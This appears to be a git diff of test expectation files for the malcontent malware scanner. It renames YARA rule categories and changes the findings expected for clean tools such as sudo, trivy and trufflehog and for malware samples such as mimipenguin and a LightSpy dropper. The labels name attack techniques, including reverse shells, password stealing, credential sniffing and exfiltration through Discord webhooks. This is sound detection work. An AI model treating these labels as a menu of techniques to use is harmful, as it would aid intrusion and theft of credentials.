[tcp_port](https://github.com/search?q=tcp_port&type=code)
[turn_port](https://github.com/search?q=turn_port&type=code)
[udp_port](https://github.com/search?q=udp_port&type=code)
[uv_ip](https://github.com/search?q=uv_ip&type=code)
[validatePort](https://github.com/search?q=validatePort&type=code)
[xIp](https://github.com/search?q=xIp&type=code)
[yoIp](https://github.com/search?q=yoIp&type=code) |
+| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [server_address_](https://github.com/search?q=server_address_&type=code) |
 | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.4.4](https://github.com/search?q=8.8.4.4&type=code)
[8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) |
 | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#remote_control) | Uses terms that may reference remote control abilities | [remote control](https://github.com/search?q=remote+control&type=code) |
-| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [server_address_](https://github.com/search?q=server_address_&type=code) |
 | MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [dropper](https://github.com/search?q=dropper&type=code) |
 | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip_writer](https://github.com/search?q=zip_writer&type=code) |
 | MEDIUM | [collect/databases/leveldb](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/leveldb.yara#leveldb) | accesses LevelDB databases | [LEVELDB_DATABASE](https://github.com/search?q=LEVELDB_DATABASE&type=code)
[LEVELDB_ITERATOR](https://github.com/search?q=LEVELDB_ITERATOR&type=code)
[LEVELDB_TRANSACTION](https://github.com/search?q=LEVELDB_TRANSACTION&type=code)
[LevelDBEnv](https://github.com/search?q=LevelDBEnv&type=code)
[LevelDBIH](https://github.com/search?q=LevelDBIH&type=code)
[LevelDBIterator](https://github.com/search?q=LevelDBIterator&type=code)
[LevelDBOpenErrors](https://github.com/search?q=LevelDBOpenErrors&type=code)
[LevelDBPartitionedLock](https://github.com/search?q=LevelDBPartitionedLock&type=code)
[LevelDBReadErrors](https://github.com/search?q=LevelDBReadErrors&type=code)
[LevelDBScopesKey](https://github.com/search?q=LevelDBScopesKey&type=code)
[LevelDBScopesMetadata](https://github.com/search?q=LevelDBScopesMetadata&type=code)
[LevelDBScopesUndoTask](https://github.com/search?q=LevelDBScopesUndoTask&type=code)
[LevelDBTransaction](https://github.com/search?q=LevelDBTransaction&type=code)
[LevelDBWrapper](https://github.com/search?q=LevelDBWrapper&type=code)
[LevelDBWriteErrors](https://github.com/search?q=LevelDBWriteErrors&type=code)
[MojoLevelDB](https://github.com/search?q=MojoLevelDB&type=code)
[OpenAndVerifyLevelDBDatabase](https://github.com/search?q=OpenAndVerifyLevelDBDatabase&type=code)
[OpenLevelDBScopes](https://github.com/search?q=OpenLevelDBScopes&type=code)
[indexed_db_leveldb_operations](https://github.com/search?q=indexed_db_leveldb_operations&type=code)
[lazy_leveldb](https://github.com/search?q=lazy_leveldb&type=code)
[leveldbH](https://github.com/search?q=leveldbH&type=code)
[leveldb_0x](https://github.com/search?q=leveldb_0x&type=code)
[leveldb_chrome](https://github.com/search?q=leveldb_chrome&type=code)
[leveldb_database](https://github.com/search?q=leveldb_database&type=code)
[leveldb_proto](https://github.com/search?q=leveldb_proto&type=code)
[leveldb_scopes](https://github.com/search?q=leveldb_scopes&type=code)
[leveldb_value_store](https://github.com/search?q=leveldb_value_store&type=code)
[proto_leveldb_wrapper](https://github.com/search?q=proto_leveldb_wrapper&type=code)
[transactional_leveldb_iterator](https://github.com/search?q=transactional_leveldb_iterator&type=code) |
@@ -26,7 +26,7 @@
 | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) |
 | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code)
[networkInterfaces](https://github.com/search?q=networkInterfaces&type=code) |
 | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [macAddress](https://github.com/search?q=macAddress&type=code) |
-| MEDIUM | [discover/process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) |
+| MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) |
 | MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) |
 | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) |
 | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) |
@@ -107,7 +107,7 @@
 | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) |
 | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) |
 | LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) |
-| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
+| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
 | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
 | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
 | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
@@ -143,7 +143,6 @@
 | LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) |
 | LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) |
 | LOW | [hw/wireless](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/wireless.yara#bssid) | wireless network base station ID | [BSSID](https://github.com/search?q=BSSID&type=code)
[bssid](https://github.com/search?q=bssid&type=code) |
-| LOW | [impact/exploit/GCONV_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/exploit/GCONV_PATH.yara#gconv_path) | references character conversion configuration | [GCONV_PATH](https://github.com/search?q=GCONV_PATH&type=code) |
 | LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [require('dns')](https://github.com/search?q=require%28%27dns%27%29&type=code) |
 | LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [resolv.conf](https://github.com/search?q=resolv.conf&type=code) |
 | LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) |
diff --git a/tests/linux/clean/slirp4netns.simple b/tests/linux/clean/slirp4netns.simple
index 59973f623..29b5561f0 100644
--- a/tests/linux/clean/slirp4netns.simple
+++ b/tests/linux/clean/slirp4netns.simple
@@ -1,4 +1,4 @@
-# linux/clean/slirp4netns: high
+# linux/clean/slirp4netns: medium
 anti-behavior/LD_DEBUG: medium
 anti-behavior/LD_PROFILE: medium
 c2/addr/ip: medium
@@ -9,7 +9,8 @@ credential/sniffer/bpf: medium
 discover/group/lookup: medium
 discover/network/interface_list: medium
 discover/network/mac_address: medium
-discover/process/parent_pid_get: low
+discover/process/parent: low
+discover/system/dev_full: medium
 discover/system/platform: low
 discover/system/sysinfo: medium
 discover/user/HOME: low
@@ -64,16 +65,13 @@ fs/tempdir/TMPDIR: low
 fs/unmount: low
 fs/watch: low
 hw/cpu: medium
-impact/exploit/GCONV_PATH: low
 impact/reboot: low
-impact/remote_access/reverse_shell: medium
 lateral/scan/tool: medium
 mem/anonymous_file: medium
 net/dns/reverse: medium
 net/dns/servers: low
 net/dns/txt: low
 net/download: medium
-net/download/fetch: high
 net/ip/addr: medium
 net/ip/icmp: low
 net/ip/multicast_send: low
diff --git a/tests/linux/clean/sudo.simple b/tests/linux/clean/sudo.simple
index 3fa77a429..11c1f7965 100644
--- a/tests/linux/clean/sudo.simple
+++ b/tests/linux/clean/sudo.simple
@@ -1,7 +1,7 @@
 # linux/clean/sudo: medium
 credential/password: low
 discover/network/interface_list: medium
-discover/process/parent_pid_get: low
+discover/process/parent: low
 discover/system/cpu_info: low
 discover/system/hostname_get: low
 discover/user/HOME: low
@@ -27,6 +27,7 @@ fs/path/usr_sbin: low
 fs/path/var: low
 fs/permission/chown: low
 fs/proc/arbitrary_pid: medium
+fs/proc/pid_exe: medium
 fs/tempdir/tempfile_create: low
 net/ip/string: medium
 net/socket/listen: medium
@@ -34,7 +35,6 @@ net/socket/local_addr: low
 net/socket/receive: low
 net/socket/send: low
 os/kernel/seccomp: low
-privesc/sudo: medium
 privesc/sudoers: low
 process/chroot: low
 process/groupid_set: low
diff --git a/tests/linux/clean/tracer.o.aarch64.simple b/tests/linux/clean/tracer.o.aarch64.simple
index 1864ab728..887baac34 100644
--- a/tests/linux/clean/tracer.o.aarch64.simple
+++ b/tests/linux/clean/tracer.o.aarch64.simple
@@ -4,6 +4,7 @@ collect/databases/mysql: medium
 discover/network/netstat: medium
 evasion/bypass_security/linux/iptables: medium
 evasion/logging/acct: low
+evasion/process_injection/ptrace: low
 impact/remote_access/heartbeat: medium
 net/http/post: medium
 net/ip/multicast_send: low
diff --git a/tests/linux/clean/trivy.simple b/tests/linux/clean/trivy.simple
index 8a2a5453d..948f3b110 100644
--- a/tests/linux/clean/trivy.simple
+++ b/tests/linux/clean/trivy.simple
@@ -6,8 +6,8 @@
 3P/threat_hunting/privilegeescalation: medium
 c2/addr/http_dynamic: medium
 c2/addr/ip: medium
+c2/addr/server: medium
 c2/discovery/ip_dns_resolver: medium
-c2/server_address: medium
 c2/tool_transfer/download: medium
 c2/tool_transfer/github_raw: medium
 collect/archives/unarchive: medium
@@ -53,7 +53,7 @@ discover/cloud/google_metadata: low
 discover/cloud/google_storage: low
 discover/network/mac_address: medium
 discover/network/netstat: medium
-discover/process/name_get: medium
+discover/process/name: medium
 discover/processes/list: medium
 discover/system/cpu_info: low
 discover/system/hostname_get: low
@@ -66,6 +66,7 @@ evasion/file/location/chdir_unusual: medium
 evasion/file/location/dev_shm: medium
 evasion/file/location/var_run: medium
 evasion/file/prefix: medium
+evasion/process_injection/ptrace: low
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/dylib/symbol_address: medium
diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md
index d21d13145..84d5c2ff3 100644
--- a/tests/linux/clean/trufflehog.md
+++ b/tests/linux/clean/trufflehog.md
@@ -3,7 +3,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_php_url_with_question) | contains hardcoded endpoint with a question mark | 
[https://api.mesibo.com/api.php?op=useradd&token=https](https://api.mesibo.com/api.php?op=useradd&token=https)
[https://api.route4me.com/api.v4/address_book.php?api_key=https](https://api.route4me.com/api.v4/address_book.php?api_key=https)
[https://api.websitepulse.com/textserver.php?method=GetContacts&username=](https://api.websitepulse.com/textserver.php?method=GetContacts&username=)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https) | -| HIGH | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.com](https://github.com/search?q=pastebin.com&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code) | +| HIGH | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.Scanner](https://github.com/search?q=pastebin.Scanner&type=code)
[pastebin.com/api/api_post](https://github.com/search?q=pastebin.com%2Fapi%2Fapi_post&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code)
[pastebin.init](https://github.com/search?q=pastebin.init&type=code) | | HIGH | [c2/tool_transfer/grayware](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/grayware.yara#grayware_sites) | References websites that host code that can be used maliciously | [shodan.io](https://github.com/search?q=shodan.io&type=code) | | HIGH | [discover/ip/public](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/ip/public_ip.yara#iplookup_website) | public service to discover external IP address | [ipify.or](https://github.com/search?q=ipify.or&type=code) | | HIGH | [exfil/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/discord.yara#discord_bot) | [Uses the Discord webhooks API](https://github.com/bartblaze/community/blob/3f3997f8c79c3605ae6d5324c8578cb12c452512/data/yara/binaries/indicator_high.yar#L706) | [discord.com/api/webhooks/](https://github.com/search?q=discord.com%2Fapi%2Fwebhooks%2F&type=code) | @@ -25,6 +25,7 @@ | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)
[VMware](https://github.com/search?q=VMware&type=code) | | MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba](http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba)
[https://%s.api.mailchimp.com/3.0/https](https://%s.api.mailchimp.com/3.0/https)
[https://%s.api.mailchimp.com/3.0https](https://%s.api.mailchimp.com/3.0https)
[https://%s.billomat.net/api/v2/clients/myself](https://%s.billomat.net/api/v2/clients/myself)
[https://%s.caspio.com/oauth/tokenhttps](https://%s.caspio.com/oauth/tokenhttps)
[https://%s.currencycloud.com](https://%s.currencycloud.com)
[https://%s.fibery.io/api/commandsTruffleHog3](https://%s.fibery.io/api/commandsTruffleHog3)
[https://%s.flowlu.com/api/v1/module/crm/lead/list](https://%s.flowlu.com/api/v1/module/crm/lead/list)
[https://%s.formsite.com/api/v2/](https://%s.formsite.com/api/v2/)
[https://%s.kanbantool.com/api/v3/users/current.jsonhttps](https://%s.kanbantool.com/api/v3/users/current.jsonhttps)
[https://%s.leankit.com/io/accounthttps](https://%s.leankit.com/io/accounthttps)
[https://%s.s3](https://%s.s3)
[https://%s.salesmate.io/apis/v3/companies/1](https://%s.salesmate.io/apis/v3/companies/1)
[https://%s.scalr.io/api/iacp/v3/agentshttps](https://%s.scalr.io/api/iacp/v3/agentshttps)
[https://%s.vouchery.io/api/v2.0/usershttps](https://%s.vouchery.io/api/v2.0/usershttps)
[https://%s/account.json](https://%s/account.json)
[https://%s/admin/api/2024](https://%s/admin/api/2024)
[https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR](https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR)
[https://%s/api/laml/2010](https://%s/api/laml/2010)
[https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx](https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx)
[https://%s/api/v1/projects](https://%s/api/v1/projects)
[https://%s/api/v1/sources](https://%s/api/v1/sources)
[https://%s/api/v1/users/meopsgenie.com/alert/detail/https](https://%s/api/v1/users/meopsgenie.com/alert/detail/https)
[https://%s/api/v1/userserror](https://%s/api/v1/userserror)
[https://%s/api/v2/tickets](https://%s/api/v2/tickets)
[https://%s/api/v3/users/current.json](https://%s/api/v3/users/current.json)
[https://%s/auth/oauth2/v2/tokenhttps](https://%s/auth/oauth2/v2/tokenhttps)
[https://%s/invoices.json](https://%s/invoices.json)
[https://%s/v2/lastUpdateTimeBeamer](https://%s/v2/lastUpdateTimeBeamer)
[https://%sSCRAM](https://%sSCRAM) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[aIp](https://github.com/search?q=aIp&type=code)
[a_ip](https://github.com/search?q=a_ip&type=code)
[accel_port](https://github.com/search?q=accel_port&type=code)
[allowed_port](https://github.com/search?q=allowed_port&type=code)
[announce_port](https://github.com/search?q=announce_port&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[fastly_ip](https://github.com/search?q=fastly_ip&type=code)
[firewall_ip](https://github.com/search?q=firewall_ip&type=code)
[geo_ip](https://github.com/search?q=geo_ip&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[htcp_port](https://github.com/search?q=htcp_port&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[i_ip](https://github.com/search?q=i_ip&type=code)
[icp_port](https://github.com/search?q=icp_port&type=code)
[in_ip](https://github.com/search?q=in_ip&type=code)
[ip_port](https://github.com/search?q=ip_port&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[lookupPort](https://github.com/search?q=lookupPort&type=code)
[m_ip](https://github.com/search?q=m_ip&type=code)
[miss_port](https://github.com/search?q=miss_port&type=code)
[nIp](https://github.com/search?q=nIp&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[old_ip](https://github.com/search?q=old_ip&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[pages_ip](https://github.com/search?q=pages_ip&type=code)
[parsePort](https://github.com/search?q=parsePort&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[privateIp](https://github.com/search?q=privateIp&type=code)
[relay_port](https://github.com/search?q=relay_port&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[routedPort](https://github.com/search?q=routedPort&type=code)
[snmp_port](https://github.com/search?q=snmp_port&type=code)
[snmpd_port](https://github.com/search?q=snmpd_port&type=code)
[stripPort](https://github.com/search?q=stripPort&type=code)
[tIp](https://github.com/search?q=tIp&type=code)
[vIp](https://github.com/search?q=vIp&type=code) | +| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [ConnectServer](https://github.com/search?q=ConnectServer&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) | | MEDIUM | [collect/archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/unarchive.yara#unarchive) | unarchives files | [UnarchiveProject](https://github.com/search?q=UnarchiveProject&type=code)
[unarchiveadmin](https://github.com/search?q=unarchiveadmin&type=code)
[unarchiveapp_configurations](https://github.com/search?q=unarchiveapp_configurations&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code) | 
@@ -114,7 +115,7 @@ | LOW | [discover/cloud/aws_metadata](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/aws-metadata.yara#aws_metadata) | References the AWS EC2 metadata token | [X-aws-ec2-metadata-token](https://github.com/search?q=X-aws-ec2-metadata-token&type=code) | | LOW | [discover/cloud/google_metadata](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-metadata.yara#google_metadata) | Includes the token required to use the Google Cloud Platform metadata server | [Metadata-Flavor](https://github.com/search?q=Metadata-Flavor&type=code) | | LOW | [discover/cloud/google_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-storage.yara#go_import) | Capable of using Google Cloud Storage (GCS) | [cloud.google.com/go/storage](https://github.com/search?q=cloud.google.com%2Fgo%2Fstorage&type=code) | -| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) | | LOW | 
[discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [syscall.Uname](https://github.com/search?q=syscall.Uname&type=code)
[uname](https://github.com/search?q=uname&type=code) |
diff --git a/tests/linux/mimipenguin/python/mimipenguin.simple b/tests/linux/mimipenguin/python/mimipenguin.simple
index 9e1275d11..ea0e3b51a 100644
--- a/tests/linux/mimipenguin/python/mimipenguin.simple
+++ b/tests/linux/mimipenguin/python/mimipenguin.simple
@@ -7,7 +7,7 @@ credential/password/finder: high
 credential/ssh/d: medium
 data/base64/decode: medium
 data/encoding/base64: low
-discover/process/name_get: medium
+discover/process/name: medium
 discover/processes/list: medium
 discover/system/platform: medium
 exfil/stealer/password: critical
diff --git a/tests/macOS/2024.LightSpy/dropper.simple b/tests/macOS/2024.LightSpy/dropper.simple
index 913a536eb..292c43b62 100644
--- a/tests/macOS/2024.LightSpy/dropper.simple
+++ b/tests/macOS/2024.LightSpy/dropper.simple
@@ -6,7 +6,7 @@ c2/tool_transfer/macos: critical
 crypto/aes: low
 crypto/xor: high
 data/hash/md5: medium
-discover/process/name_get: medium
+discover/process/name: medium
 discover/system/cpu_info: low
 discover/system/network: high
 discover/system/platform: medium
diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff
index 939d68075..29b2837f7 100644
--- a/tests/macOS/clean/ls.mdiff
+++ b/tests/macOS/clean/ls.mdiff
@@ -7,6 +7,7 @@ | -LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | -LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | -LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | +| -LOW | [hw/dev/ubi](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users) | expected ubi users | [Usage:](https://github.com/search?q=Usage%3A&type=code) | | -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
